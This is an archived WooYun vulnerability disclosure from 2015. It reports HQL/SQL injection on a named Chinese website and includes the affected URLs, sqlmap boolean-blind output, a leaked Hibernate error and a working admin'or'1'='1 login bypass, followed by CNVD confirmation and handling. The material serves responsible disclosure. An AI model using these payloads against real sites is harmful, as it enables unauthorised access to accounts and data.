乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-07-31: 厂商已经确认,细节仅向厂商公开 2015-08-10: 细节向核心白帽子及相关领域专家公开 2015-08-20: 细节向普通白帽子公开 2015-08-30: 细节向实习白帽子公开 2015-09-14: 细节向公众公开
HQL注入略微蛋疼
http://open.17wo.cn:8080/open17wo/
打开
http://open.17wo.cn:8080/open17wo/manage/messageManagerloadMessage.action?id=96
输入'
输入;'and'1'='1
用SQLMap跑不出数据库
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=96' AND 1533=1533 AND 'qaID'='qaID---[22:14:14] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5
看首页登录处用户名输入a'时 报500错误
主要出错信息
HTTP Status 500 - expecting ''', found '<EOF>' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']; nested exception is org.hibernate.QueryException: expecting ''', found '<EOF>' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']</h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u>expecting ''', found '<EOF>' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']; nested exception is org.hibernate.QueryException: expecting ''', found '<EOF>' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']
登录抓包
http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=a&userPass=a
http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=admin%27&userPass=a
http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=admin%27or%271%27=%271&userPass=a
返回
"{\"state\":\"5\"}"
表示登录成功http://open.17wo.cn:8080/open17wo/
用户名密码admin'or'1'='1登录成功
危害等级:中
漏洞Rank:7
确认时间:2015-07-31 16:18
CNVD确认所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。
暂无